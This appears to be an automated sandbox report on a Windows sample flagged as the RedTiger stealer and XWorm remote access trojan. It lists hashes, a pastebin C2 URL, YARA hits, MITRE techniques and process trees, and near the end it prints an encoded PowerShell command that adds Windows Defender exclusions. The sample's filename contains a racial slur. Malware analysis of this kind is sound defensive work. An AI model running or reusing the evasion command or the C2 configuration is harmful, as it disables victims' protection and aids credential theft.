redtiger | 203209dc760b42b540e871713f2b65210e7e7cbf815493b170722b93e4f7a58f

Analysis

max time kernel
18s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05-01-2025 00:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

niggacoin.exe
Size

3.6MB
MD5

765acfef2d7e2ef70720849522e0faeb
SHA1

e0432c262256d542359b3736362c1ed259915c54
SHA256

203209dc760b42b540e871713f2b65210e7e7cbf815493b170722b93e4f7a58f
SHA512

9266517309bd6491e4eaa24ed79edff7f37ed783957d1934c7748718d9c3d710636a36661a7f206590ba77a57d946ab852ba633ac8c645a2c35208c8fbfa9ad6
SSDEEP

98304:4y6ViOKz/eToA4cUJ4xMbDGDAyFGUPn68ufhPZS:h6VFKz2ToAINP8AyFvZAh8

Score

10^/10

redtiger xworm defense_evasion discovery execution rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

W0dvRoDKJr1YA1AA

Attributes

Install_directory
%AppData%
install_file
USB.exe
pastebin_url
https://pastebin.com/raw/fSgk0zpE

aes.plain

Signatures

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral1/files/0x000e0000000122ed-5.dat	family_xworm
behavioral1/memory/2776-11-0x0000000001280000-0x00000000012AE000-memory.dmp	family_xworm
behavioral1/memory/2372-716-0x00000000011D0000-0x00000000011FE000-memory.dmp	family_xworm
behavioral1/memory/1968-1979-0x0000000000C90000-0x0000000000CBE000-memory.dmp	family_xworm
behavioral1/memory/1000-2964-0x0000000000100000-0x000000000012E000-memory.dmp	family_xworm

Detects RedTiger Stealer 64 IoCs

stealer

resource	yara_rule
behavioral1/files/0x000e0000000122ed-5.dat	redtigerv122
behavioral1/files/0x000e0000000122ed-5.dat	redtigerv22
behavioral1/files/0x000e0000000122ed-5.dat	redtiger_stealer_detection
behavioral1/files/0x000e0000000122ed-5.dat	redtiger_stealer_detection_v2
behavioral1/files/0x000e0000000122ed-5.dat	staticSred
behavioral1/files/0x000e0000000122ed-5.dat	staticred
behavioral1/files/0x000e0000000122ed-5.dat	redtiger_stealer_detection_v1
behavioral1/files/0x0008000000016f02-10.dat	redtigerv122
behavioral1/files/0x0008000000016f02-10.dat	redtigerv22
behavioral1/files/0x0008000000016f02-10.dat	redtiger_stealer_detection
behavioral1/files/0x0008000000016f02-10.dat	redtiger_stealer_detection_v2
behavioral1/files/0x0008000000016f02-10.dat	staticSred
behavioral1/files/0x0008000000016f02-10.dat	staticred
behavioral1/files/0x0008000000016f02-10.dat	redtiger_stealer_detection_v1
behavioral1/memory/2776-11-0x0000000001280000-0x00000000012AE000-memory.dmp	redtigerv122
behavioral1/memory/2776-11-0x0000000001280000-0x00000000012AE000-memory.dmp	redtigerv22
behavioral1/memory/2776-11-0x0000000001280000-0x00000000012AE000-memory.dmp	redtiger_stealer_detection
behavioral1/memory/2776-11-0x0000000001280000-0x00000000012AE000-memory.dmp	redtiger_stealer_detection_v2
behavioral1/memory/2776-11-0x0000000001280000-0x00000000012AE000-memory.dmp	staticSred
behavioral1/memory/2776-11-0x0000000001280000-0x00000000012AE000-memory.dmp	staticred
behavioral1/memory/2776-11-0x0000000001280000-0x00000000012AE000-memory.dmp	redtiger_stealer_detection_v1
behavioral1/memory/2300-160-0x00000000030D0000-0x0000000003D1A000-memory.dmp	redtigerv122
behavioral1/memory/2300-160-0x00000000030D0000-0x0000000003D1A000-memory.dmp	redtigerv22
behavioral1/memory/2300-160-0x00000000030D0000-0x0000000003D1A000-memory.dmp	redtiger_stealer_detection
behavioral1/memory/2300-160-0x00000000030D0000-0x0000000003D1A000-memory.dmp	redtiger_stealer_detection_v2
behavioral1/memory/2300-160-0x00000000030D0000-0x0000000003D1A000-memory.dmp	staticSred
behavioral1/memory/2300-160-0x00000000030D0000-0x0000000003D1A000-memory.dmp	staticred
behavioral1/memory/2300-160-0x00000000030D0000-0x0000000003D1A000-memory.dmp	redtiger_stealer_detection_v1
behavioral1/memory/2300-159-0x00000000772B0000-0x00000000773AA000-memory.dmp	redtigerv122
behavioral1/memory/2300-159-0x00000000772B0000-0x00000000773AA000-memory.dmp	redtigerv22
behavioral1/memory/2300-159-0x00000000772B0000-0x00000000773AA000-memory.dmp	redtiger_stealer_detection
behavioral1/memory/2300-159-0x00000000772B0000-0x00000000773AA000-memory.dmp	redtiger_stealer_detection_v2
behavioral1/memory/2300-159-0x00000000772B0000-0x00000000773AA000-memory.dmp	staticSred
behavioral1/memory/2300-159-0x00000000772B0000-0x00000000773AA000-memory.dmp	staticred
behavioral1/memory/2300-159-0x00000000772B0000-0x00000000773AA000-memory.dmp	redtiger_stealer_detection_v1
behavioral1/memory/2300-158-0x0000000077190000-0x00000000772AF000-memory.dmp	redtigerv122
behavioral1/memory/2300-158-0x0000000077190000-0x00000000772AF000-memory.dmp	redtigerv22
behavioral1/memory/2300-158-0x0000000077190000-0x00000000772AF000-memory.dmp	redtiger_stealer_detection
behavioral1/memory/2300-158-0x0000000077190000-0x00000000772AF000-memory.dmp	redtiger_stealer_detection_v2
behavioral1/memory/2300-158-0x0000000077190000-0x00000000772AF000-memory.dmp	staticSred
behavioral1/memory/2300-158-0x0000000077190000-0x00000000772AF000-memory.dmp	staticred
behavioral1/memory/2300-158-0x0000000077190000-0x00000000772AF000-memory.dmp	redtiger_stealer_detection_v1
behavioral1/memory/4052-398-0x000000001B6A0000-0x000000001B982000-memory.dmp	redtigerv122
behavioral1/memory/4052-398-0x000000001B6A0000-0x000000001B982000-memory.dmp	redtigerv22
behavioral1/memory/4052-398-0x000000001B6A0000-0x000000001B982000-memory.dmp	redtiger_stealer_detection
behavioral1/memory/4052-398-0x000000001B6A0000-0x000000001B982000-memory.dmp	redtiger_stealer_detection_v2
behavioral1/memory/4052-398-0x000000001B6A0000-0x000000001B982000-memory.dmp	staticSred
behavioral1/memory/4052-398-0x000000001B6A0000-0x000000001B982000-memory.dmp	staticred
behavioral1/memory/4052-398-0x000000001B6A0000-0x000000001B982000-memory.dmp	redtiger_stealer_detection_v1
behavioral1/memory/4052-399-0x0000000001F70000-0x0000000001F78000-memory.dmp	redtigerv122
behavioral1/memory/4052-399-0x0000000001F70000-0x0000000001F78000-memory.dmp	redtigerv22
behavioral1/memory/4052-399-0x0000000001F70000-0x0000000001F78000-memory.dmp	redtiger_stealer_detection
behavioral1/memory/4052-399-0x0000000001F70000-0x0000000001F78000-memory.dmp	redtiger_stealer_detection_v2
behavioral1/memory/4052-399-0x0000000001F70000-0x0000000001F78000-memory.dmp	staticSred
behavioral1/memory/4052-399-0x0000000001F70000-0x0000000001F78000-memory.dmp	staticred
behavioral1/memory/4052-399-0x0000000001F70000-0x0000000001F78000-memory.dmp	redtiger_stealer_detection_v1
behavioral1/memory/2372-716-0x00000000011D0000-0x00000000011FE000-memory.dmp	redtigerv122
behavioral1/memory/2372-716-0x00000000011D0000-0x00000000011FE000-memory.dmp	redtigerv22
behavioral1/memory/2372-716-0x00000000011D0000-0x00000000011FE000-memory.dmp	redtiger_stealer_detection
behavioral1/memory/2372-716-0x00000000011D0000-0x00000000011FE000-memory.dmp	redtiger_stealer_detection_v2
behavioral1/memory/2372-716-0x00000000011D0000-0x00000000011FE000-memory.dmp	staticSred
behavioral1/memory/2372-716-0x00000000011D0000-0x00000000011FE000-memory.dmp	staticred
behavioral1/memory/2372-716-0x00000000011D0000-0x00000000011FE000-memory.dmp	redtiger_stealer_detection_v1
behavioral1/memory/1968-1979-0x0000000000C90000-0x0000000000CBE000-memory.dmp	redtigerv122

Redtiger family
redtiger
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2324	powershell.exe
3160	powershell.exe
3956	powershell.exe
4052	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2776	msedge.exe
2724	msedge.exe
3056	msedge.exe
2852	msedge.exe
2940	msedge.exe
2624	msedge.exe
2988	msedge.exe
1136	msedge.exe
2180	msedge.exe
1660	msedge.exe
2064	msedge.exe
2968	msedge.exe
2916	msedge.exe
2380	msedge.exe
1284	msedge.exe
2640	msedge.exe
2360	msedge.exe
2024	msedge.exe
948	msedge.exe
1280	msedge.exe
2108	msedge.exe
2488	msedge.exe
2576	msedge.exe
860	msedge.exe
1516	msedge.exe
1860	msedge.exe
1372	msedge.exe
2324	msedge.exe
1004	msedge.exe
1008	msedge.exe
1440	msedge.exe
2548	msedge.exe
2472	msedge.exe
2704	msedge.exe
2668	msedge.exe
2064	msedge.exe
3168	msedge.exe
3324	msedge.exe
3428	msedge.exe
3548	msedge.exe
3644	msedge.exe
3816	msedge.exe
3932	msedge.exe
1544	msedge.exe
3164	msedge.exe
3268	msedge.exe
1908	msedge.exe
1700	msedge.exe
2620	msedge.exe
4076	msedge.exe
1540	msedge.exe
3260	msedge.exe
2640	msedge.exe
3972	msedge.exe
2296	msedge.exe
3880	msedge.exe
3884	msedge.exe
2400	msedge.exe
2096	msedge.exe
916	msedge.exe
2276	msedge.exe
600	msedge.exe
3484	msedge.exe
3392	msedge.exe

Loads dropped DLL 64 IoCs

pid	Process
2436	niggacoin.exe
2980	niggacoin.exe
2752	niggacoin.exe
2196	niggacoin.exe
2892	niggacoin.exe
2948	niggacoin.exe
1028	niggacoin.exe
2428	niggacoin.exe
1552	niggacoin.exe
1480	niggacoin.exe
1428	niggacoin.exe
1940	niggacoin.exe
2684	niggacoin.exe
1556	niggacoin.exe
2144	niggacoin.exe
2468	niggacoin.exe
916	niggacoin.exe
2904	niggacoin.exe
1132	niggacoin.exe
2196	niggacoin.exe
2372	niggacoin.exe
2072	niggacoin.exe
1844	niggacoin.exe
2300	niggacoin.exe
2228	niggacoin.exe
2588	niggacoin.exe
2948	niggacoin.exe
1004	niggacoin.exe
2636	niggacoin.exe
2420	niggacoin.exe
1720	niggacoin.exe
2872	niggacoin.exe
1136	niggacoin.exe
2792	niggacoin.exe
2164	niggacoin.exe
2684	niggacoin.exe
3092	niggacoin.exe
3176	niggacoin.exe
3336	niggacoin.exe
3444	niggacoin.exe
3560	niggacoin.exe
3684	niggacoin.exe
3844	niggacoin.exe
3952	niggacoin.exe
2684	niggacoin.exe
2124	niggacoin.exe
668	niggacoin.exe
2640	niggacoin.exe
1460	niggacoin.exe
3860	niggacoin.exe
3976	niggacoin.exe
4040	niggacoin.exe
2644	niggacoin.exe
2800	niggacoin.exe
3848	niggacoin.exe
352	niggacoin.exe
2788	niggacoin.exe
3848	niggacoin.exe
2148	niggacoin.exe
568	niggacoin.exe
2600	niggacoin.exe
1596	niggacoin.exe
584	niggacoin.exe
3856	niggacoin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 42 IoCs

Web Service

T1102

flow	ioc
16	pastebin.com
20	pastebin.com
26	pastebin.com
41	pastebin.com
28	pastebin.com
33	pastebin.com
34	pastebin.com
36	pastebin.com
37	pastebin.com
44	pastebin.com
7	pastebin.com
22	pastebin.com
32	pastebin.com
10	pastebin.com
15	pastebin.com
21	pastebin.com
23	pastebin.com
25	pastebin.com
39	pastebin.com
38	pastebin.com
8	pastebin.com
11	pastebin.com
12	pastebin.com
18	pastebin.com
19	pastebin.com
27	pastebin.com
13	pastebin.com
24	pastebin.com
29	pastebin.com
31	pastebin.com
35	pastebin.com
46	pastebin.com
6	pastebin.com
9	pastebin.com
30	pastebin.com
43	pastebin.com
45	pastebin.com
14	pastebin.com
17	pastebin.com
40	pastebin.com
42	pastebin.com
47	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	niggacoin.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3392	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2688	powershell.exe
2204	powershell.exe
2560	powershell.exe
1992	powershell.exe
2904	powershell.exe
2008	powershell.exe
2000	powershell.exe
1196	powershell.exe
1672	powershell.exe
2028	powershell.exe
2020	powershell.exe
2656	powershell.exe
2856	powershell.exe
1904	powershell.exe
804	powershell.exe
2804	powershell.exe
1620	powershell.exe
2612	powershell.exe
2704	powershell.exe
2932	powershell.exe
2128	powershell.exe
2784	powershell.exe
760	powershell.exe
1748	powershell.exe
2756	powershell.exe
2868	powershell.exe
1464	powershell.exe
1844	powershell.exe
932	powershell.exe
2560	powershell.exe
272	powershell.exe
2632	powershell.exe
2772	powershell.exe
2408	powershell.exe
1224	powershell.exe
1136	powershell.exe
3136	powershell.exe
3236	powershell.exe
3376	powershell.exe
3516	powershell.exe
3604	powershell.exe
3756	powershell.exe
3904	powershell.exe
4008	powershell.exe
3288	powershell.exe
844	powershell.exe
3580	powershell.exe
3780	powershell.exe
1988	powershell.exe
2808	powershell.exe
4092	powershell.exe
3264	powershell.exe
1220	powershell.exe
1956	powershell.exe
332	powershell.exe
556	powershell.exe
4036	powershell.exe
800	powershell.exe
2124	powershell.exe
572	powershell.exe
2244	powershell.exe
1020	powershell.exe
3516	powershell.exe
804	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	3056	msedge.exe
Token: SeDebugPrivilege	2776	msedge.exe
Token: SeDebugPrivilege	2724	msedge.exe
Token: SeDebugPrivilege	2852	msedge.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	2940	msedge.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	2624	msedge.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeDebugPrivilege	2988	msedge.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	1136	msedge.exe
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeDebugPrivilege	2180	msedge.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	1660	msedge.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	2064	msedge.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	2968	msedge.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	2916	msedge.exe
Token: SeDebugPrivilege	2380	msedge.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	1904	powershell.exe
Token: SeDebugPrivilege	1284	msedge.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeDebugPrivilege	2640	msedge.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2360	msedge.exe
Token: SeDebugPrivilege	2024	msedge.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	948	msedge.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	1280	msedge.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	2108	msedge.exe
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	2488	msedge.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2576	msedge.exe
Token: SeDebugPrivilege	760	powershell.exe
Token: SeDebugPrivilege	860	msedge.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	1516	msedge.exe
Token: SeDebugPrivilege	1860	msedge.exe
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	1372	msedge.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	2324	msedge.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	932	powershell.exe
Token: SeDebugPrivilege	1004	msedge.exe
Token: SeDebugPrivilege	1008	msedge.exe
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	1440	msedge.exe
Token: SeDebugPrivilege	2548	msedge.exe
Token: SeDebugPrivilege	272	powershell.exe
Token: SeDebugPrivilege	2472	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2436 wrote to memory of 2204	2436	niggacoin.exe	31
PID 2436 wrote to memory of 2204	2436	niggacoin.exe	31
PID 2436 wrote to memory of 2204	2436	niggacoin.exe	31
PID 2436 wrote to memory of 2204	2436	niggacoin.exe	31
PID 2436 wrote to memory of 2776	2436	niggacoin.exe	33
PID 2436 wrote to memory of 2776	2436	niggacoin.exe	33
PID 2436 wrote to memory of 2776	2436	niggacoin.exe	33
PID 2436 wrote to memory of 2776	2436	niggacoin.exe	33
PID 2436 wrote to memory of 2980	2436	niggacoin.exe	34
PID 2436 wrote to memory of 2980	2436	niggacoin.exe	34
PID 2436 wrote to memory of 2980	2436	niggacoin.exe	34
PID 2436 wrote to memory of 2980	2436	niggacoin.exe	34
PID 2980 wrote to memory of 2688	2980	niggacoin.exe	35
PID 2980 wrote to memory of 2688	2980	niggacoin.exe	35
PID 2980 wrote to memory of 2688	2980	niggacoin.exe	35
PID 2980 wrote to memory of 2688	2980	niggacoin.exe	35
PID 2980 wrote to memory of 2724	2980	niggacoin.exe	37
PID 2980 wrote to memory of 2724	2980	niggacoin.exe	37
PID 2980 wrote to memory of 2724	2980	niggacoin.exe	37
PID 2980 wrote to memory of 2724	2980	niggacoin.exe	37
PID 2980 wrote to memory of 2752	2980	niggacoin.exe	38
PID 2980 wrote to memory of 2752	2980	niggacoin.exe	38
PID 2980 wrote to memory of 2752	2980	niggacoin.exe	38
PID 2980 wrote to memory of 2752	2980	niggacoin.exe	38
PID 2752 wrote to memory of 2560	2752	niggacoin.exe	147
PID 2752 wrote to memory of 2560	2752	niggacoin.exe	147
PID 2752 wrote to memory of 2560	2752	niggacoin.exe	147
PID 2752 wrote to memory of 2560	2752	niggacoin.exe	147
PID 2752 wrote to memory of 3056	2752	niggacoin.exe	41
PID 2752 wrote to memory of 3056	2752	niggacoin.exe	41
PID 2752 wrote to memory of 3056	2752	niggacoin.exe	41
PID 2752 wrote to memory of 3056	2752	niggacoin.exe	41
PID 2752 wrote to memory of 2196	2752	niggacoin.exe	106
PID 2752 wrote to memory of 2196	2752	niggacoin.exe	106
PID 2752 wrote to memory of 2196	2752	niggacoin.exe	106
PID 2752 wrote to memory of 2196	2752	niggacoin.exe	106
PID 2196 wrote to memory of 1992	2196	niggacoin.exe	116
PID 2196 wrote to memory of 1992	2196	niggacoin.exe	116
PID 2196 wrote to memory of 1992	2196	niggacoin.exe	116
PID 2196 wrote to memory of 1992	2196	niggacoin.exe	116
PID 2196 wrote to memory of 2852	2196	niggacoin.exe	45
PID 2196 wrote to memory of 2852	2196	niggacoin.exe	45
PID 2196 wrote to memory of 2852	2196	niggacoin.exe	45
PID 2196 wrote to memory of 2852	2196	niggacoin.exe	45
PID 2196 wrote to memory of 2892	2196	niggacoin.exe	46
PID 2196 wrote to memory of 2892	2196	niggacoin.exe	46
PID 2196 wrote to memory of 2892	2196	niggacoin.exe	46
PID 2196 wrote to memory of 2892	2196	niggacoin.exe	46
PID 2892 wrote to memory of 2904	2892	niggacoin.exe	144
PID 2892 wrote to memory of 2904	2892	niggacoin.exe	144
PID 2892 wrote to memory of 2904	2892	niggacoin.exe	144
PID 2892 wrote to memory of 2904	2892	niggacoin.exe	144
PID 2892 wrote to memory of 2940	2892	niggacoin.exe	49
PID 2892 wrote to memory of 2940	2892	niggacoin.exe	49
PID 2892 wrote to memory of 2940	2892	niggacoin.exe	49
PID 2892 wrote to memory of 2940	2892	niggacoin.exe	49
PID 2892 wrote to memory of 2948	2892	niggacoin.exe	156
PID 2892 wrote to memory of 2948	2892	niggacoin.exe	156
PID 2892 wrote to memory of 2948	2892	niggacoin.exe	156
PID 2892 wrote to memory of 2948	2892	niggacoin.exe	156
PID 2948 wrote to memory of 2008	2948	niggacoin.exe	51
PID 2948 wrote to memory of 2008	2948	niggacoin.exe	51
PID 2948 wrote to memory of 2008	2948	niggacoin.exe	51
PID 2948 wrote to memory of 2008	2948	niggacoin.exe	51

C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2436
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2204
- C:\Users\Admin\AppData\Local\Temp\msedge.exe
  "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
  "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2688
- - C:\Users\Admin\AppData\Local\Temp\msedge.exe
    "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
    3⤵
